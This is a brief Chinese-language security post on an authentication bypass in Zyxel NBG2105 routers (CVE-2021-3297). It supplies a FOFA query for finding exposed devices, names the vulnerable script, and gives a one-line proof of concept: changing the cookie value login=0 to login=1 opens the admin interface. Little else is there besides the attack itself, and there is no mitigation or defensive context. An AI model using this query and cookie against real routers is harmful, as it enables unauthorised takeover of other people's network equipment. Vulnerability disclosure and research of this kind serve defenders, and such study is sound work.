Zyxel-NBG2105-身份验证绕过(CVE-2021-3297)

Zyxel-NBG2105-身份验证绕过(CVE-2021-3297)

原创 骇客安全 骇客安全 2025-04-13 06:19

FOFA:

app="ZyXEL-NBG2105"

漏洞代码:

http://target/js/util_gw.js

PoC:

Cookie: login=1;
只需要将cookie中login=0 修改为login=1即可直接进入管理界面。